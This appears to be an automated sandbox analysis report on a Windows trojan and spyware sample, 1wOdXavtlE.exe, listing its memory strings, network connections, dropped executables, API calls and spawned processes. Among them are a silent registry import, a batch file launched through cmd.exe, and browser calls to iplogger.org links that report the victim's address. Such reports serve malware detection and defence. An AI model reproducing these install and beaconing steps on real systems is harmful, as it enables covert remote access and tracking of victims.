Source: 1wOdXavtlE.exe, 00000002.00000002.487142544.0000000002EAE000.00000004.00000001.sdmp, 1wOdXavtlE.exe, 00000002.00000002.490169443.0000000003080000.00000004.00000001.sdmp	String found in binary or memory: https://support.google.com/chrome/?p=plugin_flash
Source: 1wOdXavtlE.exe, 00000002.00000002.487142544.0000000002EAE000.00000004.00000001.sdmp	String found in binary or memory: https://support.google.com/chrome/?p=plugin_java
Source: 1wOdXavtlE.exe, 00000002.00000002.487142544.0000000002EAE000.00000004.00000001.sdmp	String found in binary or memory: https://support.google.com/chrome/?p=plugin_pdf
Source: 1wOdXavtlE.exe, 00000002.00000002.487142544.0000000002EAE000.00000004.00000001.sdmp	String found in binary or memory: https://support.google.com/chrome/?p=plugin_quicktime
Source: 1wOdXavtlE.exe, 00000002.00000002.487142544.0000000002EAE000.00000004.00000001.sdmp	String found in binary or memory: https://support.google.com/chrome/?p=plugin_real
Source: 1wOdXavtlE.exe, 00000002.00000002.487142544.0000000002EAE000.00000004.00000001.sdmp, 1wOdXavtlE.exe, 00000002.00000002.490169443.0000000003080000.00000004.00000001.sdmp	String found in binary or memory: https://support.google.com/chrome/?p=plugin_shockwave
Source: 1wOdXavtlE.exe, 00000002.00000002.487142544.0000000002EAE000.00000004.00000001.sdmp	String found in binary or memory: https://support.google.com/chrome/?p=plugin_wmp
Source: 1wOdXavtlE.exe, 00000002.00000002.487142544.0000000002EAE000.00000004.00000001.sdmp, 1wOdXavtlE.exe, 00000002.00000002.490169443.0000000003080000.00000004.00000001.sdmp	String found in binary or memory: https://support.google.com/chrome/answer/6258784
Source: 1wOdXavtlE.exe, 00000002.00000002.484483214.0000000002C30000.00000004.00000001.sdmp, 1wOdXavtlE.exe, 00000002.00000002.483762527.0000000002BC1000.00000004.00000001.sdmp	String found in binary or memory: https://web-security-reports.services.atlassian.com/csp-report/bb-website;
Source: 1wOdXavtlE.exe, 00000002.00000002.483762527.0000000002BC1000.00000004.00000001.sdmp	String found in binary or memory: https://wtfismyip.com/text
Source: 1wOdXavtlE.exe, 00000002.00000003.399986812.0000000001111000.00000004.00000001.sdmp	String found in binary or memory: https://www.digicert.com/CPS0
Source: 1wOdXavtlE.exe, 00000002.00000002.488788111.0000000002F9C000.00000004.00000001.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: svchost.exe, 0000000F.00000003.448897541.00000221A3B7C000.00000004.00000001.sdmp, svchost.exe, 0000000F.00000003.448884292.00000221A3B74000.00000004.00000001.sdmp	String found in binary or memory: https://www.roblox.com/develop
Source: svchost.exe, 0000000F.00000003.448897541.00000221A3B7C000.00000004.00000001.sdmp, svchost.exe, 0000000F.00000003.448884292.00000221A3B74000.00000004.00000001.sdmp	String found in binary or memory: https://www.roblox.com/info/privacy

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49722
Source: unknown	Network traffic detected: HTTP traffic on port 49733 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49733
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49721
Source: unknown	Network traffic detected: HTTP traffic on port 49734 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49743
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49720
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49731
Source: unknown	Network traffic detected: HTTP traffic on port 49731 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49743 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49728 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49721 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49720 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49722 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49728
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49723
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49734

Source: unknown	HTTPS traffic detected: 104.192.141.1:443 -> 192.168.2.6:49720 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 52.216.141.204:443 -> 192.168.2.6:49721 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 88.99.66.31:443 -> 192.168.2.6:49722 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 88.99.66.31:443 -> 192.168.2.6:49723 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 52.216.179.59:443 -> 192.168.2.6:49731 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 88.99.66.31:443 -> 192.168.2.6:49734 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 88.99.66.31:443 -> 192.168.2.6:49733 version: TLS 1.2

Source: ssevs.exe, 00000016.00000002.482511545.0000000001458000.00000004.00000020.sdmp

Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

Source: C:\Users\user\AppData\Local\Temp\is-BVEFJ.tmp\pass.tmp

File created: C:\ProgramData\Immunity\CertMgry\is-I14BP.tmp

Jump to dropped file

System Summary:

Uses regedit.exe to modify the Windows registry

Show sources

Source: C:\Windows\System32\cmd.exe

Process created: C:\Windows\regedit.exe regedit /s C:\ProgramData\Immunity\ses.reg

Source: C:\Users\user\AppData\Local\Temp\servs.exe	Code function: 17_2_004A0E24 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,
Source: C:\Users\user\AppData\Local\Temp\is-5B1U4.tmp\servs.tmp	Code function: 19_2_005ECBC0 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,

Source: C:\Windows\System32\cmd.exe

File created: C:\Windows

Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Code function: 0_2_00D4C36C
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Code function: 0_2_00D4ED38
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Code function: 0_2_04DC0488
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Code function: 0_2_04DC1C8B
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Code function: 0_2_04DC0478
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Code function: 0_2_04DC06F8
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Code function: 0_2_04DC06E9
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Code function: 0_2_04DC5A38
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Code function: 0_2_04DEF668
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Code function: 0_2_04DE90F8
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Code function: 0_2_04DEA140
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Code function: 0_2_04DECED0
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Code function: 0_2_04DE6F60
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Code function: 0_2_04DE2A50
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Code function: 0_2_04DED0B8
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Code function: 0_2_04DED0A8
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Code function: 0_2_04DEE3DF
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Code function: 0_2_04DEE3E0
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Code function: 0_2_04DEF350
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Code function: 2_2_00FBD7F0
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Code function: 2_2_00FBCAB8
Source: C:\Users\user\AppData\Local\Temp\servs.exe	Code function: 17_2_004254D0
Source: C:\Users\user\AppData\Local\Temp\servs.exe	Code function: 17_2_0040ECB4
Source: C:\Users\user\AppData\Local\Temp\servs.exe	Code function: 17_2_00431F50
Source: C:\Users\user\AppData\Local\Temp\is-5B1U4.tmp\servs.tmp	Code function: 19_2_0064022C
Source: C:\Users\user\AppData\Local\Temp\is-5B1U4.tmp\servs.tmp	Code function: 19_2_0041073E
Source: C:\Users\user\AppData\Local\Temp\is-5B1U4.tmp\servs.tmp	Code function: 19_2_0040AFF4
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe	Code function: 22_2_0301EA60
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe	Code function: 22_2_0301EA70
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe	Code function: 22_2_0301CA7C
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe	Code function: 22_2_07696FD0
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe	Code function: 22_2_0769A618
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe	Code function: 22_2_07691C78
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe	Code function: 22_2_07690B60
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe	Code function: 22_2_07692B90
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe	Code function: 22_2_076912B0
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe	Code function: 22_2_076961D8
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe	Code function: 22_2_07690040
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe	Code function: 22_2_07696FC0
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe	Code function: 22_2_07697FA9
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe	Code function: 22_2_07697FB0
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe	Code function: 22_2_0769A609
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe	Code function: 22_2_07694E00
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe	Code function: 22_2_07694568
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe	Code function: 22_2_07694578
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe	Code function: 22_2_07694DF0
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe	Code function: 22_2_07691C6A
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe	Code function: 22_2_07697498
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe	Code function: 22_2_0769A368
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe	Code function: 22_2_07692B7A
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe	Code function: 22_2_0769AB42
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe	Code function: 22_2_0769A359
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe	Code function: 22_2_07694BE0
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe	Code function: 22_2_07694BD0
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe	Code function: 22_2_07695278
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe	Code function: 22_2_07699249
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe	Code function: 22_2_07693A40
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe	Code function: 22_2_07699258
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe	Code function: 22_2_07693A30
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe	Code function: 22_2_07690AD1
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe	Code function: 22_2_076912A1
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe	Code function: 22_2_07695288
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe	Code function: 22_2_07697978
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe	Code function: 22_2_0769A920
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe	Code function: 22_2_0769A930
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe	Code function: 22_2_076961C8
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe	Code function: 22_2_07697988
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe	Code function: 22_2_0769506A
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe	Code function: 22_2_07695078
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe	Code function: 22_2_07690006
Source: C:\Windows \System32\PasswordOnWakeSettingFlyout.exe	Code function: 23_2_00007FF7D9F53D48

Source: C:\Users\user\AppData\Local\Temp\is-5B1U4.tmp\servs.tmp	Code function: String function: 005EA59C appears 31 times
Source: C:\Users\user\AppData\Local\Temp\is-5B1U4.tmp\servs.tmp	Code function: String function: 005BC3D8 appears 40 times
Source: C:\Users\user\AppData\Local\Temp\is-5B1U4.tmp\servs.tmp	Code function: String function: 005D3750 appears 46 times
Source: C:\Users\user\AppData\Local\Temp\is-5B1U4.tmp\servs.tmp	Code function: String function: 005F3814 appears 36 times
Source: C:\Users\user\AppData\Local\Temp\is-5B1U4.tmp\servs.tmp	Code function: String function: 005D3A34 appears 60 times
Source: C:\Users\user\AppData\Local\Temp\is-5B1U4.tmp\servs.tmp	Code function: String function: 005F3590 appears 39 times

Source: servs.tmp.17.dr	Static PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
Source: servs.tmp.17.dr	Static PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows

Source: is-PFD3D.tmp.19.dr

Static PE information: Number of sections : 17 > 10

Source: 1wOdXavtlE.exe	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: servs.tmp.17.dr	Static PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST

Source: 1wOdXavtlE.exe, 00000000.00000002.348986565.00000000028F2000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenameMetroFramework.dll> vs 1wOdXavtlE.exe
Source: 1wOdXavtlE.exe, 00000000.00000002.348986565.00000000028F2000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenameSynchronal.exe4 vs 1wOdXavtlE.exe
Source: 1wOdXavtlE.exe, 00000000.00000000.322469152.000000000036B000.00000002.00020000.sdmp	Binary or memory string: OriginalFilename~ vs 1wOdXavtlE.exe
Source: 1wOdXavtlE.exe, 00000000.00000002.350278531.0000000002CCA000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenameMajorRevision.exe< vs 1wOdXavtlE.exe
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	Binary or memory string: OriginalFilenameIEFRAME.DLL.MUID vs 1wOdXavtlE.exe
Source: 1wOdXavtlE.exe, 00000002.00000002.482401861.0000000001030000.00000004.00000020.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs 1wOdXavtlE.exe
Source: 1wOdXavtlE.exe, 00000002.00000002.500485146.000000000443C000.00000004.00000001.sdmp	Binary or memory string: OriginalFilename6Qgb9 vs 1wOdXavtlE.exe
Source: 1wOdXavtlE.exe, 00000002.00000002.532430822.00000000087F0000.00000002.00000001.sdmp	Binary or memory string: System.OriginalFileName vs 1wOdXavtlE.exe
Source: 1wOdXavtlE.exe, 00000002.00000002.530971740.00000000080C0000.00000002.00000001.sdmp	Binary or memory string: OriginalFilenameSHELL32.DLL.MUIj% vs 1wOdXavtlE.exe
Source: 1wOdXavtlE.exe, 00000002.00000002.477691078.000000000080B000.00000002.00020000.sdmp	Binary or memory string: OriginalFilename~ vs 1wOdXavtlE.exe
Source: 1wOdXavtlE.exe, 00000002.00000002.484483214.0000000002C30000.00000004.00000001.sdmp	Binary or memory string: OriginalFilename vs 1wOdXavtlE.exe
Source: 1wOdXavtlE.exe, 00000002.00000002.492060863.0000000003C24000.00000004.00000001.sdmp	Binary or memory string: OriginalFilename9 vs 1wOdXavtlE.exe
Source: 1wOdXavtlE.exe, 00000002.00000002.530783769.0000000007F50000.00000002.00000001.sdmp	Binary or memory string: originalfilename vs 1wOdXavtlE.exe
Source: 1wOdXavtlE.exe, 00000002.00000002.530783769.0000000007F50000.00000002.00000001.sdmp	Binary or memory string: OriginalFilenamepropsys.dll.mui@ vs 1wOdXavtlE.exe
Source: 1wOdXavtlE.exe, 00000002.00000002.476252478.0000000000418000.00000040.00000001.sdmp	Binary or memory string: OriginalFilenameSynchronal.exe4 vs 1wOdXavtlE.exe

Source: 1wOdXavtlE.exe

Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED

Source: 1wOdXavtlE.exe

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: 1wOdXavtlE.exe, kAcPJ2X7wUALIuMwgg/iVyVSA2sQXubY7OcVe.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 1wOdXavtlE.exe, kAcPJ2X7wUALIuMwgg/iVyVSA2sQXubY7OcVe.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 1wOdXavtlE.exe, kAcPJ2X7wUALIuMwgg/iVyVSA2sQXubY7OcVe.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 0.2.1wOdXavtlE.exe.2a0000.0.unpack, kAcPJ2X7wUALIuMwgg/iVyVSA2sQXubY7OcVe.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 0.2.1wOdXavtlE.exe.2a0000.0.unpack, kAcPJ2X7wUALIuMwgg/iVyVSA2sQXubY7OcVe.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 0.2.1wOdXavtlE.exe.2a0000.0.unpack, kAcPJ2X7wUALIuMwgg/iVyVSA2sQXubY7OcVe.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 0.0.1wOdXavtlE.exe.2a0000.0.unpack, kAcPJ2X7wUALIuMwgg/iVyVSA2sQXubY7OcVe.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 0.0.1wOdXavtlE.exe.2a0000.0.unpack, kAcPJ2X7wUALIuMwgg/iVyVSA2sQXubY7OcVe.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 0.0.1wOdXavtlE.exe.2a0000.0.unpack, kAcPJ2X7wUALIuMwgg/iVyVSA2sQXubY7OcVe.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 2.2.1wOdXavtlE.exe.400000.0.unpack, BrowserExtension/Data/Crypto/CryptoHelper.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 2.0.1wOdXavtlE.exe.740000.0.unpack, kAcPJ2X7wUALIuMwgg/iVyVSA2sQXubY7OcVe.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 2.0.1wOdXavtlE.exe.740000.0.unpack, kAcPJ2X7wUALIuMwgg/iVyVSA2sQXubY7OcVe.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 2.0.1wOdXavtlE.exe.740000.0.unpack, kAcPJ2X7wUALIuMwgg/iVyVSA2sQXubY7OcVe.cs	Cryptographic APIs: 'CreateDecryptor'

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@50/66@28/9

Source: C:\Users\user\AppData\Local\Temp\servs.exe	Code function: 17_2_004A0E24 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,
Source: C:\Users\user\AppData\Local\Temp\is-5B1U4.tmp\servs.tmp	Code function: 19_2_005ECBC0 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,

Source: C:\Users\user\AppData\Local\Temp\servs.exe

Code function: 17_2_0041A5FC GetDiskFreeSpaceW,

Source: C:\Users\user\AppData\Local\Temp\is-5B1U4.tmp\servs.tmp

Code function: 19_2_00601290 GetVersion,CoCreateInstance,

Source: C:\Users\user\AppData\Local\Temp\servs.exe

Code function: 17_2_004A16FC FindResourceW,SizeofResource,LoadResource,LockResource,

Source: C:\Users\user\Desktop\1wOdXavtlE.exe

File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\1wOdXavtlE.exe.log

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4440:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4996:120:WilError_01
Source: C:\ProgramData\Immunity\rutserv.exe	Mutant created: \Sessions\1\BaseNamedObjects\madExceptSettingsMtx$694
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4980:120:WilError_01

Source: C:\Users\user\Desktop\1wOdXavtlE.exe

File created: C:\Users\user\AppData\Local\Temp\tmp379E.tmp

Jump to behavior

Source: Yara match	File source: 00000025.00000002.549143519.0000000000401000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000025.00000000.508478042.0000000000401000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match	File source: C:\ProgramData\Immunity\is-2SOD7.tmp, type: DROPPED
Source: Yara match	File source: C:\ProgramData\Immunity\is-4BBH3.tmp, type: DROPPED

Source: C:\Users\user\AppData\Local\Temp\is-5B1U4.tmp\servs.tmp

Process created: C:\Windows\System32\cmd.exe 'C:\Windows\system32\cmd.exe' /C ''C:\ProgramData\uacwev.bat''

Source: 1wOdXavtlE.exe

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\AppData\Local\Temp\servs.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\user\AppData\Local\Temp\servs.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\user\AppData\Local\Temp\is-5B1U4.tmp\servs.tmp	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\user\AppData\Local\Temp\is-5B1U4.tmp\servs.tmp	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\ProgramData\pass.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\ProgramData\pass.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\user\AppData\Local\Temp\is-BVEFJ.tmp\pass.tmp	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\user\AppData\Local\Temp\is-BVEFJ.tmp\pass.tmp	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\ProgramData\Immunity\rutserv.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\ProgramData\Immunity\rutserv.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales

Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Users\user\AppData\Local\Temp\sssevs.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Users\user\AppData\Local\Temp\sssevs.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll

Source: C:\Users\user\Desktop\1wOdXavtlE.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId='1'
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId='1'
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId='1'

Source: C:\Users\user\Desktop\1wOdXavtlE.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\1wOdXavtlE.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Source: C:\Users\user\AppData\Local\Temp\is-5B1U4.tmp\servs.tmp

Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOrganization

Source: C:\Users\user\Desktop\1wOdXavtlE.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\System32\svchost.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\System32\svchost.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Local\Temp\sssevs.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Local\Temp\sssevs.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Local\Temp\sssevs.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\svchost.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\svchost.exe	File read: C:\Windows\System32\drivers\etc\hosts

Source: 1wOdXavtlE.exe	Metadefender: Detection: 16%
Source: 1wOdXavtlE.exe	ReversingLabs: Detection: 58%

Source: servs.exe

String found in binary or memory: rting applications. /LOADINF="filename" Instructs Setup to load the settings from the specified file after having checked the co

Source: unknown	Process created: C:\Users\user\Desktop\1wOdXavtlE.exe 'C:\Users\user\Desktop\1wOdXavtlE.exe'
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Process created: C:\Users\user\Desktop\1wOdXavtlE.exe {path}
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Process created: C:\Program Files\internet explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' https://iplogger.org/1tncg7
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Process created: C:\Program Files\internet explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' https://iplogger.org/1tsTg7
Source: C:\Program Files\internet explorer\iexplore.exe	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6732 CREDAT:17410 /prefetch:2
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Process created: C:\Users\user\AppData\Local\Temp\servs.exe 'C:\Users\user\AppData\Local\Temp\servs.exe'
Source: C:\Program Files\internet explorer\iexplore.exe	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6732 CREDAT:82946 /prefetch:2
Source: C:\Users\user\AppData\Local\Temp\servs.exe	Process created: C:\Users\user\AppData\Local\Temp\is-5B1U4.tmp\servs.tmp 'C:\Users\user\AppData\Local\Temp\is-5B1U4.tmp\servs.tmp' /SL5='$104D8,10541093,724480,C:\Users\user\AppData\Local\Temp\servs.exe'
Source: C:\Users\user\AppData\Local\Temp\is-5B1U4.tmp\servs.tmp	Process created: C:\Windows\System32\cmd.exe 'C:\Windows\system32\cmd.exe' /C ''C:\ProgramData\uacwev.bat''
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Process created: C:\Users\user\AppData\Local\Temp\ssevs.exe 'C:\Users\user\AppData\Local\Temp\ssevs.exe'
